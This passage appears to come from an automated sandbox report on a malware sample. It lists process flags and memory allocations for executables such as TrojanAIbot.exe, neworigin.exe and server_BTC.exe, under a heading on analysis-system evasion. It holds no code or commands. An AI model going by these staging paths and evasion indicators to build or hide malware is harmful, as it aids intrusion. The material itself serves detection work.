                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F20000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F21000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F4D000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F4E000 memory commit 500350976
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2FA4000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 309C000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 309E000 memory commit 500015104
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2E40000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2E41000 memory commit 500178944Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2E6D000 memory commit 500002816Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2E6E000 memory commit 500350976Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2EC4000 memory commit 501014528Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2FBC000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2FBE000 memory commit 500015104Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2EE0000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2EE1000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F0D000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F0E000 memory commit 500350976
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F64000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 305C000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 305E000 memory commit 500015104
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 1210000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 4D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 980000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 4360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1470000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 3230000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 17D0000 memory reserve | memory write watch
